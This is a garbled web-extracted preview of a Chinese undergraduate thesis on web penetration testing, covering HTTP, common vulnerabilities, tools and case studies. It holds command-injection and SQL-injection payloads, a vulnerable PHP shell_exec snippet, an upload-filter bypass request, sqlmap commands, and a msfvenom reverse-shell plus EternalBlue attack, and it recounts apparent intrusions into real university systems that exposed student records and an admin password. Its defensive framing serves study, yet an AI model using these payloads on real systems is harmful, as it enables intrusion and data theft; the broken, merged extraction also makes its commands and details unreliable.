eeb安全安全滲透測試技術實踐_第1頁
eeb安全安全滲透測試技術實踐_第2頁
eeb安全安全滲透測試技術實踐_第3頁
eeb安全安全滲透測試技術實踐_第4頁
eeb安全安全滲透測試技術實踐_第5頁
已閱讀5頁,還剩59頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

1、PAGE1院 系 學生學號 編 號 本科畢業(yè)設計題目 web安全滲透測試技術實踐 學生姓名 cui0 x01 專業(yè)名稱 指導教師 2017年5月6日WEB安全滲透測試技術實踐摘要:隨著互聯(lián)網產業(yè)的高速發(fā)展,互聯(lián)網對人們生活的改變越來越大,人們在購物時可以使用電子支付,政府在辦公時可以使用電子政務系統(tǒng),大家在學習的時候可以看優(yōu)質的網絡課程,當然互聯(lián)網給人們帶來的便利不僅如此,現(xiàn)在,整個傳統(tǒng)行業(yè)都在網互聯(lián)網+靠近,誠然,互聯(lián)網給傳統(tǒng)行業(yè)添加了活力。但網絡是把雙刃劍,在給人們帶來方便的同時也會帶來一些不利的影響,比如說網絡信息問題,一些不法分子通過入侵網絡上的web應用系統(tǒng),對個人造成信息泄露,對企

2、業(yè)造成商業(yè)機密泄露導致財產損失,對國家造成安全威脅。近幾年國家高度重視網絡安全,打擊網絡犯罪,此片文章介紹了web的組成和常見web漏洞原理,提高企業(yè)和個人警惕性,讓企業(yè)個人更好保護自己的財產和隱私,身為每位公民維護網絡世界的純凈和平每個人應盡的義務和責任。關鍵詞:web安全;網絡安全;滲透測試Web security penetration testing technology practiceAbstract:With the rapid development of Internet, the Internet changes to peoples lives more and more

3、 big, people can use electronic payment when shopping, the government can use the electronic government affairs system in the office, you can see when learning quality of network curriculum, of course, the Internet bring convenience to people not only that, but now, the traditional industries in net

4、 Internet + near, admittedly, the Internet to the traditional industry has added vitality. But the network is a double-edged sword, in the network brings us convenience and at the same time, some criminals through the invasion of web application system on the network, for personal information, comme

5、rcial secrets to the enterprise has resulted in property damage, damage to national security threats. Country attaches great importance to the network security in recent years, crack down on Internet crime, this article introduces the composition of the web, and common web vulnerability principle, i

6、mprove the enterprise and individual vigilance, make enterprise people better protect the privacy of their own property and as each citizen to maintain the network world of purity and peace everyones duty and responsibility.Key words: Web Security; network security; penetration testing目錄 TOC o 1-3 h

7、 z u HYPERLINK l _Toc8 1緒論( PAGEREF _Toc8 h 1) HYPERLINK l _Toc9 研究背景及意義( PAGEREF _Toc9 h 1) HYPERLINK l _Toc0 WEB安全現(xiàn)狀( PAGEREF _Toc0 h 2) HYPERLINK l _Toc1 本文結構( PAGEREF _Toc1 h 3) HYPERLINK l _Toc2 2 WEB滲透測試理論基礎( PAGEREF _Toc2 h 3) HYPERLINK l _Toc3 WEB應用組成( PAGEREF _Toc3 h 3) HYPERLINK l _Toc4 客戶

8、端( PAGEREF _Toc4 h 3) HYPERLINK l _Toc5 服務端及數(shù)據(jù)庫( PAGEREF _Toc5 h 4) HYPERLINK l _Toc6 WEB服務器軟件及操作系統(tǒng)( PAGEREF _Toc6 h 5) HYPERLINK l _Toc7 HTTP協(xié)議簡介( PAGEREF _Toc7 h 6) HYPERLINK l _Toc8 WEB應用常見漏洞分析( PAGEREF _Toc8 h 8) HYPERLINK l _Toc9 代碼執(zhí)行和命令注入( PAGEREF _Toc9 h 8) HYPERLINK l _Toc0 SQL注入攻擊( PAGEREF

9、_Toc0 h 11) HYPERLINK l _Toc1 文件上傳( PAGEREF _Toc1 h 13) HYPERLINK l _Toc2 邏輯漏洞( PAGEREF _Toc2 h 19) HYPERLINK l _Toc3 3 WEB滲透測試常用工具( PAGEREF _Toc3 h 22) HYPERLINK l _Toc4 Firefox火狐瀏覽器( PAGEREF _Toc4 h 22) HYPERLINK l _Toc5 AWVS 網站掃描器( PAGEREF _Toc5 h 23) HYPERLINK l _Toc6 NMAP 掃描利器( PAGEREF _Toc6 h

10、24) HYPERLINK l _Toc7 Burpsuit 抓包利器( PAGEREF _Toc7 h 24) HYPERLINK l _Toc8 SQLMAP SQL漏洞利用神器( PAGEREF _Toc8 h 29) HYPERLINK l _Toc9 Hydra爆破利器( PAGEREF _Toc9 h 31) HYPERLINK l _Toc0 4 WEB滲透測試步驟設計( PAGEREF _Toc0 h 31) HYPERLINK l _Toc1 信息搜集( PAGEREF _Toc1 h 31) HYPERLINK l _Toc2 域名信息查詢( PAGEREF _Toc2 h

11、 31) HYPERLINK l _Toc3 查詢WEB服務器軟件和服務端腳本語言( PAGEREF _Toc3 h 32) HYPERLINK l _Toc4 操作系統(tǒng)指紋和開放端口掃描( PAGEREF _Toc4 h 33) HYPERLINK l _Toc5 CMS模板識別和網站目錄結構( PAGEREF _Toc5 h 35) HYPERLINK l _Toc6 旁站信息搜集( PAGEREF _Toc6 h 36) HYPERLINK l _Toc7 漏洞挖掘實戰(zhàn)( PAGEREF _Toc7 h 37) HYPERLINK l _Toc8 某高校圖書管理系統(tǒng)存在注入( PAGER

12、EF _Toc8 h 37) HYPERLINK l _Toc9 某高校網站存在上傳漏洞( PAGEREF _Toc9 h 39) HYPERLINK l _Toc0 某高校網站存在敏感文件泄露( PAGEREF _Toc0 h 41) HYPERLINK l _Toc1 某高校網認證服務器存在445端口漏洞( PAGEREF _Toc1 h 42) HYPERLINK l _Toc2 后滲透階段( PAGEREF _Toc2 h 44) HYPERLINK l _Toc3 滲透測試報告的撰寫要求( PAGEREF _Toc3 h 44) HYPERLINK l _Toc4 5總結( PAGE

13、REF _Toc4 h 46) HYPERLINK l _Toc5 參考文獻( PAGEREF _Toc5 h 47) HYPERLINK l _Toc6 謝辭( PAGEREF _Toc6 h 48) HYPERLINK l _Toc7 附錄( PAGEREF _Toc7 h 49) HYPERLINK l _Toc8 附錄1web安全腦圖( PAGEREF _Toc8 h 49) HYPERLINK l _Toc9 附錄2常見web漏洞代碼( PAGEREF _Toc9 h 50)1緒論研究背景及意義隨著互聯(lián)網的發(fā)展,互聯(lián)網+給各行業(yè)帶來新的升級的同時,傳統(tǒng)行業(yè)的業(yè)務在往向互聯(lián)網上進行遷移

14、【2】。隨著web應用的普及,個人,企業(yè)及政府都有自己的web系統(tǒng),同時電子商務,電子政務,電子支付等信息化的產物為大家?guī)矸浅4蟮谋憷?。但凡事都是有利有弊的,在信息化帶來便利的同時,也存在潛在威脅,一些不法分子通過攻擊web應用獲取非法利益,大量個人信息泄露,通過泄露的個人信息登錄支付寶,或銀行卡造成財產損失。企業(yè)的商業(yè)信息被盜走賣到競爭對手手上,造成企業(yè)專利財產等損失。國家的機密文件泄露,會給國家造成不可估量的損失,嚴重危害國家安全。下表列舉近年來影響較大的安全事件。 表 安全事件事件造成影響“棱鏡門”事件斯諾登曝光的美國的監(jiān)控計劃3,對世界信息安全敲響警鐘。OpenSSL“心臟出血”20

15、14年最知名的安全漏洞“心臟出血”,黑客利用該漏洞可獲取全球近三成以https開頭網址的用戶登錄帳號4。12306 數(shù)據(jù)泄露事件入侵者通過“撞庫”入侵,超過 13 萬條用戶數(shù)據(jù)被泄露出去,對個人出行造成不便。圓通泄露客戶百萬信息商業(yè)信不嚴重不安全,快遞行業(yè)信息泄密愈演愈烈。中國人壽近百萬份保單信息泄露保單包含個人資料全面,泄露這些資料非常危險。WEB滲透測試通過站在入侵者的立場,盡可能完整的發(fā)動技術攻擊和手段對目標應用安全性做深入測試,發(fā)現(xiàn)目標系統(tǒng)的最脆弱環(huán)節(jié),能夠讓用戶直觀的看到當前應用的脆弱性、可能造成的影響、以及采取必要的防護措施。WEB安全現(xiàn)狀WEB安全作為網絡安全分支之一,近幾年來W

16、eb系統(tǒng)遭到入侵攻擊,數(shù)據(jù)泄密,頁面被篡改數(shù)量巨大。這些被盜數(shù)據(jù)或者機密文件對個人企業(yè)或者國家機構造成很大的損失。由于近些幾年國家重視網絡安全,并且頒布相關法律,很少有學校開相關課程,web安全工程師挺缺人,很多互聯(lián)網公司保護自己公司財產,自己都設有SRC(應急響應中心),在人員招聘上重金難聘,足以說明目前web安全是一個很大缺口的市場,在未來的物聯(lián)網世界,物聯(lián)網安全很有前景。應用漏洞的研究組織OWASP組織在2013年發(fā)布了web應用前10大風險漏洞OWASP TOP10【10】,例舉了2010-2013年期間針對web攻擊頻率最高的十大攻擊方法。表 OWASP TOP 10-2013序號漏

17、洞名稱A1注入A2失效的身份認證和會話管理A3跨站腳本(XSS)A4不安全的直接對象引用A5安全配置錯誤A6敏感信息泄漏A7功能級訪問控制缺失A8跨站請求偽造 (CSRF)A9使用含有已知漏洞的組件A10未驗證的重定向和轉發(fā)目前隨著國家高度重視網絡安全,在此巨大市場缺口的下,國內安全公司如雨后春筍般拔地而起,原先一些攻擊者懼于現(xiàn)在的網絡安全法,現(xiàn)在已經洗白從事安全維護工作,壯大了安全公司,隨著這個行業(yè)被認可,商業(yè)化市場缺口推動著安全公司對技術的追求。這里列舉了一些國內常見的安全廠商和產品。表 國內常見安全廠商和產品廠商名稱產品名稱360360主機衛(wèi)士知道創(chuàng)宇樂安全安全狗安全狗主機衛(wèi)士綠盟科技W

18、eb應用防火墻深信服下一代防火墻啟明星辰WAF10000本文結構第一章是緒論說明了對滲透技術實踐的背景和意義,以及目前web安全的現(xiàn)狀。第二章是對web組成結構的了解,先知道是什么東西,其次再對web方面的常見漏洞原理分析。第三章古人說工欲善其事必先利其器,這張介紹了一些輔助工具,再手工滲透的時候借助工具可以提高效率。第四章是完整的web滲透流程,將零碎的知識串起來,從而達到一個層次的提升。第五章是一個實踐的項目,實踐是查驗理論的獨一標準,通過實踐,可以大大提高自身的技術和興趣。2 web滲透測試理論基礎 web應用組成客戶端HTML語言簡介HTML是這幾個(Hyper Text Mark-u

19、p Language )英文首字母大寫的縮寫,用中文翻譯過來就是文本標記語言,通常我們所說上網沖浪中“沖浪”訪問的頁面主要就是用這種語言寫的。 HTML語言通常可以表示文字、圖片、動畫片、音樂、鏈接等。其組成部分主要由head、Body組成。CSS是Cascading Style Sheet,這三個英文首字母大寫的縮寫。中文翻譯為層疊樣式表。是用來增強網頁排版和網頁內容優(yōu)化的一種語言。 可以這么說,HTML的標簽是定義網站頁面的內容,CSS標簽是控制網站頁面的內容如何顯示。Javascript是一種瀏覽器端的腳本的言語,可以通過瀏覽器直接執(zhí)行,廣泛用于web前段。服務端及數(shù)據(jù)庫PHP語言簡介P

20、HP是由Hypertext Preprocessor縮寫而得到的,中文翻譯過來“超文本處理”是一種很優(yōu)秀的服務端腳本語言。很多大型網站,博客系統(tǒng),購物系統(tǒng)都是用php語言編寫的,通常php+mysql+apche+liunx是非常好的組合。ASP/語言簡介ASP(ActiveServerPages),其實是一套微軟開發(fā)的服務器端腳本環(huán)境,是創(chuàng)建動態(tài)網頁的一個很好的工具【5】,是ASP的升級版,不過比ASP更加優(yōu)秀,具有網站開發(fā)的解決方案,包括驗證身份,緩存網頁等。其部署和調試非常簡單,通常和微軟出的web容器IIS在數(shù)據(jù)庫sql server搭配較好。JSP語言簡介JSP是sun公司開發(fā)的一種

21、動態(tài)網頁技術,JSP是跨平臺的,他做出的應用可以分別在類unix和win平臺上跑起來。JSP的全稱是Java Server Pages,是由HTML代碼和嵌入到其中的JAVA代碼組成的。MYSQL/SQL SERVER/ORCLE這三個都是關系型數(shù)據(jù)庫,其中MYSQL為開源的數(shù)據(jù)庫,SQL SERVER是微軟研發(fā)出來的數(shù)據(jù)庫,ORCLE為甲骨文公司的數(shù)據(jù)庫。他們都是存儲數(shù)據(jù)的倉庫,都可以建立數(shù)據(jù)庫,數(shù)據(jù)庫里面建立數(shù)據(jù)表,數(shù)據(jù)表里面有行和列,有不同的權限,可以操縱的數(shù)據(jù)庫不一樣。web服務器軟件及操作系統(tǒng)iiS 的全稱是Internet Information Services,中文翻譯為互聯(lián)網

22、信息服務,主要是提供web服務,用于放置ASP,語言編寫的腳本,為用戶提供網上沖浪服務,網上學習,購物等。目前最新的版本是IIS8,IIS5和IIs6都有相應的文件漏洞,配合文件上傳漏洞,對web安全的危害大,可導致直接拿下web站點,進一步提權入侵操作系統(tǒng),從而滲透到內網。漏洞出現(xiàn)后微軟官方也出過相關補丁,建議升級最新的IIS組件。APCHEApacheHTTPServer(簡稱Apache)是Apache軟件基金會的一個開放源代碼的網頁服務器,可以在大多數(shù)電腦操作系統(tǒng)中運行,由于其跨平臺和安全性被廣泛使用【6】。NGINX屬于一款輕型web服務器軟件,占用內存較小,性能較好,中國許多廠商都

23、使用使用nginx的站點有:百度()、京東、新浪、騰訊、淘寶等。WINDOWS類服務器操作系統(tǒng)Windows服務器是微軟公司研發(fā)出來的一款操作系統(tǒng),服務器和我們平時用的windows操作系統(tǒng)差不多一樣,只是在某些服務功能上比普通的操作系統(tǒng)好點,在硬件資源上需要用的資源用以提供各種服務。LINUX類操作系統(tǒng)也是操作系統(tǒng)的一種,它的最大的優(yōu)點就是提供源代碼開放,可以使用很多免費開源軟件。大多數(shù)web容器都會部署在linux上面,因為liunx操作系統(tǒng)穩(wěn)定安全,占用硬件資源較小,企業(yè)用來花費少,在此基礎上衍生出很多成功版本如redhat,ubuntu,centos非常成功。HTTP協(xié)議簡介圖1 ht

24、tp請求和發(fā)送HTTP協(xié)議說明HTTP是由HyperText Transfer Protocol這三個英文首字母大寫縮寫而得到的,這個協(xié)議是負責web客戶端和服務端通信,一般版本是,由美國人Ted Nelson發(fā)明的,他想發(fā)明一種處理計算機文本的方法,為HTTP協(xié)議發(fā)展奠定了基礎。HTTP請求結構圖2 HTTP請求結構圖 一個請求由四個部分組成:請求行、請求頭標、空行和請求數(shù)據(jù)1.請求行:是由請求方法、請求URI和HTTP版本組成。例如:GET / HTTP/HTTP協(xié)議規(guī)定了8種請求的協(xié)議:GET請求是一個簡單的請求方法;HEAD請求是與GET方法類似,服務器那邊只返回狀態(tài)行和頭標,不返回所

25、要請求的文檔;POST請求向服務器傳送數(shù)據(jù)流;PUT請求是服務器保存請求數(shù)據(jù)作為指定URI新內容的請求;DELETE請求服務器請求刪除URI中命名的1資源請求的一種方式;OPTIONS請求是關于服務器支持的請求方法信息的請求;TRACE請求是Web服務器反饋Http請求和其頭標的請求;CONNECT請求是已文檔化但當前未實現(xiàn)的一個方法,預留做隧道處理。2.請求頭標:由關鍵字和值對應組成,每行一對,關鍵字和關鍵值之間用冒號分里開,請求頭標通知服務器有關于客戶端的功能和標識,典型的請求頭標有【7】:User-Agent是客戶端瀏覽器的標識;Accept是客戶端可識別的內容類型列表;Content-

26、Length是附加到請求的數(shù)據(jù)字節(jié)數(shù)??招校鹤詈笠粋€響應頭標之后是一個空行,發(fā)送回車符和退行,表明服務器以下不再有頭標【8】。 4.請求數(shù)據(jù):通過POST傳送數(shù)據(jù),經常使用的是Content-Length和Content-Type頭標這兩種標識。HTTP響應結構如下圖所示:圖3 HTTP響應頭一個響應由四個部分組成;狀態(tài)行、響應頭標、空行、響應數(shù)據(jù)狀態(tài)行:響應代碼和響應描述和HTTP版本這三個標記組成。HTTP版本:通告客戶端服務端能是別的版本。響應代碼是3位的數(shù)字代碼,用來指示請求狀態(tài)(成功或者失?。豁憫枋鍪墙忉岉憫a。例如:HTTP/ 200 OK:HTTP響應碼由1xx:信息,收到

27、請求,表示繼續(xù)處理;2xx:成功,表示請求成功;3xx:重定向,重新修改請求的url;4xx:客戶端出現(xiàn)錯誤。2.響應頭標是類似與請求頭標,里面包含服務的相關信息。3.空行是表明服務器以下不再有頭標,最后一個響應頭標之后是一個空行,發(fā)送回車符和退行。4.響應數(shù)據(jù)是html文檔相關的東西,本身需要接收的數(shù)據(jù)。web應用常見漏洞分析代碼執(zhí)行和命令注入代碼執(zhí)行,就是在web服務軟件中任意執(zhí)行惡意破壞的代碼。命令注入,就是在可以在服務端執(zhí)行操作惡意系統(tǒng)的命令。這兩種情況都是由于代碼/命令過濾不嚴謹所致。代碼執(zhí)行漏洞服務端的代碼演示。 攻擊者可以通過如下Payload實施代碼注入:/arg=1;phpi

28、nfo() 圖4 代碼執(zhí)行演示命令注入的源代碼展示PHP語言提供了一些用來執(zhí)行外部應用程序的函數(shù),例如:exec()system(),passthru(),和shell_exec()等函數(shù)。 phpif( isset( $_POST submit ) ) $target = $_REQUEST ip ; if (stristr(php_uname(s), Windows NT) $cmd = shell_exec( ping . $target ); echo .$cmd.; else $cmd = shell_exec( ping -c 3 . $target ); echo .$cmd.;

29、 這段代碼中并未對ip這個參數(shù)進行過濾,導致再輸入時可以輸入多個命令。圖5 命令注入1圖6命令注入2代碼執(zhí)行和命令注入防范思路。盡量不要使用系統(tǒng)命令執(zhí)行,在進入執(zhí)行命令函數(shù)之前,變量一定要做好過濾,對敏感字符進行轉義,在使用動態(tài)函數(shù)之前,確保使用的函數(shù)是指定函數(shù)之一,對php語言來說,不能完全控制的危險函數(shù)最好不要使用。SQL注入攻擊SQL注入漏洞是一種常見的web安全漏洞,它的本質原因是在和數(shù)據(jù)庫交互數(shù)據(jù)的時候,編程人員寫的代碼過濾不嚴謹,攻擊者經常利用這個問題,可以訪問或修改數(shù)據(jù),或者利用潛在的數(shù)據(jù)庫漏洞進行攻擊。SQL注入類型可分為3種,數(shù)字型注入,搜索型注入,字符型注入。數(shù)字型注入:

30、and 1=1; select * from news where id=1 and 1=1 字符型注入: select * from news where chr=name; select * from news where chr=name and 1=1 搜索型注入:測試; select * from news where search like % 漢字 % ; select * from news where search like %漢字 % and %1%=%1%判斷注入點判斷條件:第一必須有參數(shù),第二必須要有帶入數(shù)據(jù)庫查詢。例如: 可能存在注入。進一步通過邏輯注入語句進行判定結

31、果,一定要用邏輯判斷。 and 1=1 執(zhí)行語句select * from papers where id=1 and 2=2頁面返回顯示正常。 and 1=2; 執(zhí)行語句select * from papers where id=1 and 1=2頁面返回顯示不正常。圖7 正常頁面對比不正常頁面php+mysql手工注入演示( union select user(),database() #)圖8 注入演示1php+mysql手工注入演示( union select 1,2 #)圖9 注入演示2php+mysql手工注入演示( union select user,password from

32、users #)圖10 注入演示3文件上傳 上傳檢測流程概述 圖11 上傳演示1文件上傳檢測方法通常一個文件以HTTP協(xié)議進行上傳時,將以POST請求發(fā)送至web服務器,web服務器接收到請求并同意后,用戶與web服務器將建立連接,并傳輸dafa【9】。通常在文件上傳過程中會檢測下面紅顏色標出來的代碼。圖12 上傳演示2A 客戶端對前端語言javascript 檢測(通常為檢測需要上傳的文件擴展名)B 服務端對所上傳文件的MIME 類型檢測(檢測Content-Type 內容)C 服務端對所上傳文件的目錄路徑檢測(檢測跟path 參數(shù)相關的內容)D 服務端對所上傳文件的文件擴展名檢測(檢測跟文

33、件extension 相關的內容)E 服務端對所上傳文件的文件內容檢測(檢測內容是否合法或含有惡意代碼)客戶端檢測繞過(javascript 檢測)圖13 上傳演示3客戶端檢測主要是通過前端javascript腳本檢測文件的后綴是否為允許的格式。服務端檢測繞過(MIME 類型檢測)圖14 上傳演示4假如服務器端上的 代碼如下然后我們可以將request 包的Content-Type 修改POST / HTTP/TE: deflate,gzip;q=Connection: TE, closeHost: localhostUser-Agent: libwww-perl/Content-Type:

34、multipart/form-data; boundary=xYzZYContent-Length: 155-xYzZYContent-Disposition: form-data; name=userfile; filename=Content-Type: image/gif (原為Content-Type: text/plain)-sSxYzZY-收到服務器端返回來的應答HTTP/ 200 OKDate: Thu, 31 May 2011 14:02:11 GMTServer: Content-Length: 59Connection: closeContent-Type: text/ht

35、mlFile is valid, and was successfully uploaded.可以看到我們成功繞過了服務端MIME 類型檢測。像這種服務端檢測http 包的Content-Type 都可以用這種類似的方法來繞過檢測。圖15 上傳演示5服務器檢測繞過(目錄路徑檢測)圖16 上傳演示6目錄路徑檢測,一般就是檢測上傳的路徑是否合法,稍微有一些特殊一點的都沒有防御。比如比較新的fckeditor php python27 -r F:tools -p txtName -threads 1 -level 2 -risk 3 -random-agent -hex -v 3 SQLMAP顯示操

36、作系統(tǒng)為win2003或者XP,數(shù)據(jù)庫為ORACLE。圖47 確定注入漏洞最后從數(shù)據(jù)庫顯示來看涉及近2萬多條學生的登陸賬號密碼,姓名專業(yè)及身份證號等。C:UsersAdminpython27 -r F:tools -p txtName -threads 1 -level 2 -risk 3 -random-agent -hex -v 3 -D ILAS -tables -count圖48 泄露信息內容抽樣針對這個SQL注入漏洞,在登錄框服務端接收數(shù)據(jù)時對特殊字符例如單引號、雙引號等進行轉義。某高校網站存在上傳漏洞一般情況下,直接上傳漏洞還是很難找見的,配合目錄遍歷,可以嘗試找特殊頁面上傳文件。

37、通過目錄遍歷發(fā)現(xiàn)該網站后臺地址。域名/WebSystems/圖 49上傳演示1有開始對后臺目錄進行遍歷發(fā)現(xiàn),域名WebSystems/,該頁面泄露敏感信息。圖50 上傳演示2直接上傳webshell用菜刀連接。圖51上傳演示3菜刀連接webshell后服務器上的文件可以自行下載上傳,危害巨大。圖52 getshell針對這個問題,這些目錄中包含了敏感內容,請刪除這些目錄,或者正確設置權限,禁止用戶訪問。某高校網站存在敏感文件泄露網站敏感信息泄露,也是個危害很大的問題,有時嚴重泄露管理員賬號密碼。發(fā)現(xiàn)泄露數(shù)據(jù)庫頁面。圖53 信息泄露演示1查看數(shù)據(jù)庫語言看出管理員賬號密碼。圖54 信息泄露演示2通

38、過解密MD5值得出來后臺賬號和密碼分別為admin #hqsy$hqsy 登錄進入后臺,控制后臺之后可以隨意發(fā)文章等。圖55 登錄后臺針對此問題,加強對網站目錄權限加管理,禁止非法訪問,在服務端接收http協(xié)議中校驗x-forword是否來源于登錄頁面。某高校網認證服務器存在445端口漏洞通過泄露的NSA武器庫中的eternalblue和DoublePulsar直接可以拿下服務器權限,生成一個帶有反彈的.dll文件。Msfvenom-pwindwos/x64/meterpreter/reverse_tcplhost=lport=12399-fdll圖56 生成文件先在kali上用metaspl

39、oit設置監(jiān)聽,通過DoublePulsar將惡意文件傳送到目標機上,執(zhí)行成功,kali上收到一個反彈的會話。圖57 收到反彈會話上傳抓取管理員賬號密碼,通過3389遠程連接登錄認證服務器。圖58 成功拿到權限針對此漏洞修復方法,最完美的是及時下載微軟補丁,防止安全問題。另一方法是在防火墻入棧和出棧規(guī)則禁止445端口,這樣完全隔離端口也會起到作用。后滲透階段后滲透階段是體現(xiàn)高手和入門新手的區(qū)別,后滲透階段分為,權限維持和擴大戰(zhàn)果,權限維持是很重的,在持續(xù)對客戶應用系統(tǒng)滲透過程,后面想要挖掘出漏洞需要從業(yè)務上找問題,如果權限維持不到想進一步發(fā)掘漏洞,擴大戰(zhàn)果就會變得很難,或者從頭開始,這樣就浪費

40、大量時間和經歷。滲透測試報告的撰寫要求 滲透測試在最后階段一定要出一份滲透測試報告,這才算整個滲透的完成。滲透測試最主要的目的就是發(fā)現(xiàn)問題,要全面的站在入侵者的立場,動用一切辦法發(fā)現(xiàn)客戶的問題,并且提出修補方法,避免客戶的損失。當然,滲透測試報告作為自己幫助客戶的依據(jù),和客戶溝通的文件,更是不可缺少的。滲透測試報告是一次滲透測試的主要價值體現(xiàn):第一點,要必須寫入滲透測試概述及最終目的,然后寫入滲透測試項目的起因,如果沒有起因也可以介紹滲透測試意義。第二點,一定要精準的說明日期以及要執(zhí)行滲透測試的人員名單,也要列出的滲透測試過程中需要使用的工具。第三點,明確滲透測試的入侵的對象以及場所,可以根據(jù)

41、不同的滲透測試對象進行總結。第四點,明確滲透的使用方法,從最開始的收集信息到最后的結果生成報告。第五點,對測試結果發(fā)現(xiàn)的安全風險綜述及存在的風險加固建議。5總結目前,互聯(lián)網技術的發(fā)展速度已經遠遠超越了網絡犯罪的立法速度,有一些立法對互聯(lián)網犯罪的處罰力度非常輕,還有一些互聯(lián)網犯罪活動并沒有相關的法律規(guī)定。這種情況對于加大網絡信息安全的打擊力度是非常不利的。因此,現(xiàn)在要加快對互聯(lián)網犯罪的立法工作,使得在處理互聯(lián)網犯罪的時候可以做到有法可依。近些年,國家加大了最互聯(lián)網的監(jiān)督和監(jiān)管力度,使得很多的互聯(lián)網犯罪活動能夠在較短的時間內得到取證和解決,但是相對而言,公民的互聯(lián)網安全意思還是比較淡薄,因此,提高

42、公民的互聯(lián)網安全意識也成了迫在眉睫需要解決的問題。重點加強對全社會信息安全問題的統(tǒng)籌安排,對信息安全工作責任制要不斷深化細化;加強重點信息領域的安全保障工作,推動信息安全等工作的開展、要把安全測評、應急管理等信息安全基本制度落到實處;加快推進網絡與信息安全應急基礎平臺建設;提升信息安全綜合監(jiān)管和服務水平,積極應對信息安全新情況、新問題,針對云計算、物聯(lián)網、移動互聯(lián)網、下一代互聯(lián)網等新技術、新應用開展專項研究,建立信息安全風險評估和應對機制;建立統(tǒng)一的網絡信任體系、信息安全測評認證平臺、電子政務災難備份中心等基礎設施等,力求對信息安全保障工作形成更強的基礎支撐。參考文獻1 魏倩倩.計算機網絡信息問題分析.電子測試2014年11期:P67P692 朱斌 符剛.移動互聯(lián)網發(fā)展探討.北京:朱斌 符剛,20123 楊忱.美國信息霸權及其對我國的影響.廣西:楊忱,20154 吳松澤.基于Web安全的滲透測試技術研究.哈爾濱:吳松澤,20155 李麗萍.云南經濟管理職業(yè)學院校園信息管理系統(tǒng)設計與實現(xiàn).云南:李麗萍,20116 趙飛.基于Web的多用戶個人主頁管理系統(tǒng)設計.西安:趙飛,20137 何山.論如何構建一個輕量型嵌入式Web服務程序.電腦編程技巧與維護.2013年10期:P69P728 封相遠.基于Linux操作系統(tǒng)的Web服務器的設計與實現(xiàn).天津:封相遠,20079

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論